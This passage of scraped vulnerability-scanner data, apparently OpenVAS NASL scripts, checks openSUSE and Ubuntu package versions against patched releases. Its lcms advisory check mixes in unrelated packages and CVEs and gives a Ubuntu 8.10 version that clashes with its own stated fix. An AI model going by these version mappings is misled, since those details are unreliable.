rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"xpdf-tools\", rpm:\"xpdf-tools~3.02~95.4\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"zypper\", rpm:\"zypper~0.11.11~0.1\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"MozillaFirefox\", rpm:\"MozillaFirefox~2.0.0.21post~0.1\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"MozillaFirefox-translations\", rpm:\"MozillaFirefox-translations~2.0.0.21post~0.1\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"bluez-cups\", rpm:\"bluez-cups~3.18~13.7\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"bluez-test\", rpm:\"bluez-test~3.18~13.7\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"bluez-utils\", rpm:\"bluez-utils~3.18~13.7\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"clamav\", rpm:\"clamav~0.95.1~0.1\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"clamav-db\", rpm:\"clamav-db~0.95.1~0.1\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"cups\", rpm:\"cups~1.2.12~22.21\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"cups-client\", rpm:\"cups-client~1.2.12~22.21\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"cups-devel\", rpm:\"cups-devel~1.2.12~22.21\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"cups-libs\", rpm:\"cups-libs~1.2.12~22.21\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"glib2\", rpm:\"glib2~2.14.1~4.4\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"glib2-devel\", rpm:\"glib2-devel~2.14.1~4.4\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"glib2-doc\", rpm:\"glib2-doc~2.14.1~4.4\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"glib2-lang\", rpm:\"glib2-lang~2.14.1~4.4\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"gnutls\", rpm:\"gnutls~1.6.1~36.6\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"gnutls-devel\", rpm:\"gnutls-devel~1.6.1~36.6\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"gpg2\", rpm:\"gpg2~2.0.4~49.2\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kdepim3\", rpm:\"kdepim3~3.5.7.enterprise.0.20070904.708012~9.2\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kdepim3-devel\", rpm:\"kdepim3-devel~3.5.7.enterprise.0.20070904.708012~9.2\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kdepim3-kpilot\", rpm:\"kdepim3-kpilot~3.5.7.enterprise.0.20070904.708012~9.2\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kdepim3-mobile\", rpm:\"kdepim3-mobile~3.5.7.enterprise.0.20070904.708012~9.2\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kdepim3-notes\", rpm:\"kdepim3-notes~3.5.7.enterprise.0.20070904.708012~9.2\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kdepim3-time-management\", rpm:\"kdepim3-time-management~3.5.7.enterprise.0.20070904.708012~9.2\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kitchensync\", rpm:\"kitchensync~3.5.7.enterprise.0.20070904.708012~9.2\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"klamav\", rpm:\"klamav~0.46~0.1\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"koffice\", rpm:\"koffice~1.6.3~51.5\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"koffice-database\", rpm:\"koffice-database~1.6.3~51.5\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"koffice-database-mysql\", rpm:\"koffice-database-mysql~1.6.3~51.5\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"koffice-database-psql\", rpm:\"koffice-database-psql~1.6.3~51.5\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"koffice-devel\", rpm:\"koffice-devel~1.6.3~51.5\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"koffice-extra\", rpm:\"koffice-extra~1.6.3~51.5\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"koffice-illustration\", rpm:\"koffice-illustration~1.6.3~51.5\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"koffice-planning\", rpm:\"koffice-planning~1.6.3~51.5\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"koffice-presentation\", rpm:\"koffice-presentation~1.6.3~51.5\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"koffice-python\", rpm:\"koffice-python~1.6.3~51.5\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"koffice-ruby\", rpm:\"koffice-ruby~1.6.3~51.5\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"koffice-spreadsheet\", rpm:\"koffice-spreadsheet~1.6.3~51.5\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"koffice-wordprocessing\", rpm:\"koffice-wordprocessing~1.6.3~51.5\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"krb5\", rpm:\"krb5~1.6.2~22.9\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"krb5-apps-clients\", rpm:\"krb5-apps-clients~1.6.2~22.9\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"krb5-apps-servers\", rpm:\"krb5-apps-servers~1.6.2~22.9\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"krb5-client\", rpm:\"krb5-client~1.6.2~22.9\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"krb5-devel\", rpm:\"krb5-devel~1.6.2~22.9\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"krb5-server\", rpm:\"krb5-server~1.6.2~22.9\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libvolume_id\", rpm:\"libvolume_id~114~19.3\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libvolume_id-devel\", rpm:\"libvolume_id-devel~114~19.3\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"openswan\", rpm:\"openswan~2.4.7~64.2\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"openswan-doc\", rpm:\"openswan-doc~2.4.7~64.2\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql\", rpm:\"postgresql~8.2.13~0.1\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-contrib\", rpm:\"postgresql-contrib~8.2.13~0.1\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-devel\", rpm:\"postgresql-devel~8.2.13~0.1\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-docs\", rpm:\"postgresql-docs~8.2.13~0.1\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-libs\", rpm:\"postgresql-libs~8.2.13~0.1\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-server\", rpm:\"postgresql-server~8.2.13~0.1\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"sysconfig\", rpm:\"sysconfig~0.70.2~4.7\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"timezone\", rpm:\"timezone~2009d~0.1\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"udev\", rpm:\"udev~114~19.3\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"xine-devel\", rpm:\"xine-devel~1.1.8~14.14\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"xine-extra\", rpm:\"xine-extra~1.1.8~14.14\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"xine-lib\", rpm:\"xine-lib~1.1.8~14.14\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"xpdf\", rpm:\"xpdf~3.02~19.8\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"xpdf-tools\", rpm:\"xpdf-tools~3.02~19.8\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-12-04T11:29:52", "bulletinFamily": "scanner", "description": "The remote host is missing an update to lcms\nannounced via advisory USN-744-1.", "modified": "2017-12-01T00:00:00", "published": "2009-06-05T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=64170", "id": "OPENVAS:64170", "title": "Ubuntu USN-744-1 (lcms)", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: ubuntu_744_1.nasl 7969 2017-12-01 09:23:16Z santu $\n# $Id: ubuntu_744_1.nasl 7969 2017-12-01 09:23:16Z santu $\n# Description: Auto-generated from advisory USN-744-1 (lcms)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_solution = \"The problem can be corrected by upgrading your system to the\n following package versions:\n\nUbuntu 6.06 LTS:\n liblcms1 1.13-1ubuntu0.2\n\nUbuntu 7.10:\n liblcms1 1.16-5ubuntu3.2\n python-liblcms 1.16-5ubuntu3.2\n\nUbuntu 8.04 LTS:\n liblcms1 1.16-7ubuntu1.2\n python-liblcms 1.16-7ubuntu1.2\n\nUbuntu 8.10:\n liblcms1 1.16-10ubuntu0.2\n python-liblcms 1.16-10ubuntu0.2\n\nIn general, a standard system upgrade is sufficient to effect the\nnecessary changes.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=USN-744-1\";\n\ntag_insight = \"Chris Evans discovered that LittleCMS did not properly handle certain error\nconditions, resulting in a large memory leak. If a user or automated system\nwere tricked into processing an image with malicious ICC tags, a remote\nattacker could cause a denial of service. (CVE-2009-0581)\n\nChris Evans discovered that LittleCMS contained multiple integer overflows.\nIf a user or automated system were tricked into processing an image with\nmalicious ICC tags, a remote attacker could crash applications linked\nagainst liblcms1, leading to a denial of service, or possibly execute\narbitrary code with user privileges. (CVE-2009-0723)\n\nChris Evans discovered that LittleCMS did not properly perform bounds\nchecking, leading to a buffer overflow. If a user or automated system were\ntricked into processing an image with malicious ICC tags, a remote attacker\ncould execute arbitrary code with user privileges. (CVE-2009-0733)\";\ntag_summary = \"The remote host is missing an update to lcms\nannounced via advisory USN-744-1.\";\n\n \n\n\nif(description)\n{\n script_id(64170);\n script_version(\"$Revision: 7969 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-01 10:23:16 +0100 (Fri, 01 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-06-05 18:04:08 +0200 (Fri, 05 Jun 2009)\");\n script_cve_id(\"CVE-2009-0581\", \"CVE-2009-0723\", \"CVE-2009-0733\", \"CVE-2009-0920\", \"CVE-2009-0921\", \"CVE-2009-0927\", \"CVE-2009-0207\", \"CVE-2009-0928\", \"CVE-2009-0193\", \"CVE-2009-0629\", \"CVE-2009-0626\", \"CVE-2009-0628\", \"CVE-2009-0635\", \"CVE-2009-0633\", \"CVE-2009-0634\", \"CVE-2009-0637\", \"CVE-2009-0784\", \"CVE-2009-0698\", \"CVE-2008-5239\", \"CVE-2008-1036\", \"CVE-2008-4316\", \"CVE-2006-2426\", \"CVE-2009-1093\", \"CVE-2009-1094\", \"CVE-2009-1095\", \"CVE-2009-1096\", \"CVE-2009-1097\", \"CVE-2009-1098\", \"CVE-2009-1100\", \"CVE-2009-1101\", \"CVE-2009-1102\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Ubuntu USN-744-1 (lcms)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n script_xref(name: \"URL\" , value: \"http://www.ubuntu.com/usn/usn-744-1/\");\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"liblcms1-dev\", ver:\"1.13-1ubuntu0.2\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"liblcms1\", ver:\"1.13-1ubuntu0.2\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"liblcms-utils\", ver:\"1.13-1ubuntu0.2\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"liblcms1-dev\", ver:\"1.16-5ubuntu3.2\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"liblcms1\", ver:\"1.16-5ubuntu3.2\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"liblcms-utils\", ver:\"1.16-5ubuntu3.2\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"python-liblcms\", ver:\"1.16-5ubuntu3.2\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"liblcms1-dev\", ver:\"1.16-7ubuntu1.2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"liblcms1\", ver:\"1.16-7ubuntu1.2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"liblcms-utils\", ver:\"1.16-7ubuntu1.2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"python-liblcms\", ver:\"1.16-7ubuntu1.2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"liblcms1-dev\", ver:\"1.17.dfsg-1+lenny2\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"liblcms1\", ver:\"1.17.dfsg-1+lenny2\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"liblcms-utils\", ver:\"1.17.dfsg-1+lenny2\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"python-liblcms\", ver:\"1.17.dfsg-1+lenny2\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"systemtap\", ver:\"0.0.20080705-1+lenny1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxine-dev\", ver:\"1.1.1+ubuntu2-7.11\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxine-main1\", ver:\"1.1.1+ubuntu2-7.11\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxine-dev\", ver:\"1.1.7-1ubuntu1.5\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxine1-doc\", ver:\"1.1.7-1ubuntu1.5\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxine1-plugins\", ver:\"1.1.7-1ubuntu1.5\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxine1-dbg\", ver:\"1.1.7-1ubuntu1.5\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxine1\", ver:\"1.1.7-1ubuntu1.5\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxine1-console\", ver:\"1.1.7-1ubuntu1.5\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxine1-ffmpeg\", ver:\"1.1.7-1ubuntu1.5\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxine1-gnome\", ver:\"1.1.7-1ubuntu1.5\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxine1-doc\", ver:\"1.1.11.1-1ubuntu3.3\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxine1-all-plugins\", ver:\"1.1.11.1-1ubuntu3.3\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxine1-plugins\", ver:\"1.1.11.1-1ubuntu3.3\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxine-dev\", ver:\"1.1.11.1-1ubuntu3.3\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxine1-bin\", ver:\"1.1.11.1-1ubuntu3.3\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxine1-console\", ver:\"1.1.11.1-1ubuntu3.3\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxine1-dbg\", ver:\"1.1.11.1-1ubuntu3.3\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxine1-misc-plugins\", ver:\"1.1.11.1-1ubuntu3.3\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxine1-x\", ver:\"1.1.11.1-1ubuntu3.3\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxine1\", ver:\"1.1.11.1-1ubuntu3.3\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxine1-ffmpeg\", ver:\"1.1.11.1-1ubuntu3.3\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxine1-gnome\", ver:\"1.1.11.1-1ubuntu3.3\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxine1-doc\", ver:\"1.1.15-0ubuntu3.2\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxine1-all-plugins\", ver:\"1.1.15-0ubuntu3.2\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxine1-plugins\", ver:\"1.1.15-0ubuntu3.2\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxine-dev\", ver:\"1.1.15-0ubuntu3.2\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxine1-bin\", ver:\"1.1.15-0ubuntu3.2\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxine1-console\", ver:\"1.1.15-0ubuntu3.2\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxine1-dbg\", ver:\"1.1.15-0ubuntu3.2\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxine1-ffmpeg\", ver:\"1.1.15-0ubuntu3.2\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxine1-gnome\", ver:\"1.1.15-0ubuntu3.2\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxine1-misc-plugins\", ver:\"1.1.15-0ubuntu3.2\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxine1-x\", ver:\"1.1.15-0ubuntu3.2\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxine1\", ver:\"1.1.15-0ubuntu3.2\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"icu-doc\", ver:\"3.4.1a-1ubuntu1.6.06.2\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libicu34-dev\", ver:\"3.4.1a-1ubuntu1.6.06.2\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libicu34\", ver:\"3.4.1a-1ubuntu1.6.06.2\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"icu-doc\", ver:\"3.6-3ubuntu0.2\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libicu36-dev\", ver:\"3.6-3ubuntu0.2\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libicu36\", ver:\"3.6-3ubuntu0.2\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"icu-doc\", ver:\"3.8-6ubuntu0.1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"lib32icu-dev\", ver:\"3.8-6ubuntu0.1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"lib32icu38\", ver:\"3.8-6ubuntu0.1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libicu-dev\", ver:\"3.8-6ubuntu0.1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libicu38-dbg\", ver:\"3.8-6ubuntu0.1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libicu38\", ver:\"3.8-6ubuntu0.1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"icu-doc\", ver:\"3.8.1-2ubuntu0.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"lib32icu-dev\", ver:\"3.8.1-2ubuntu0.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"lib32icu38\", ver:\"3.8.1-2ubuntu0.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libicu-dev\", ver:\"3.8.1-2ubuntu0.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libicu38-dbg\", ver:\"3.8.1-2ubuntu0.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libicu38\", ver:\"3.8.1-2ubuntu0.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"openjdk-6-doc\", ver:\"6b12-0ubuntu6.4\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"openjdk-6-jre-lib\", ver:\"6b12-0ubuntu6.4\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"openjdk-6-source\", ver:\"6b12-0ubuntu6.4\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"openjdk-6-source-files\", ver:\"6b12-0ubuntu6.4\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"icedtea6-plugin\", ver:\"6b12-0ubuntu6.4\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"openjdk-6-dbg\", ver:\"6b12-0ubuntu6.4\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"openjdk-6-demo\", ver:\"6b12-0ubuntu6.4\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"openjdk-6-jdk\", ver:\"6b12-0ubuntu6.4\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"openjdk-6-jre-headless\", ver:\"6b12-0ubuntu6.4\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"openjdk-6-jre\", ver:\"6b12-0ubuntu6.4\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not 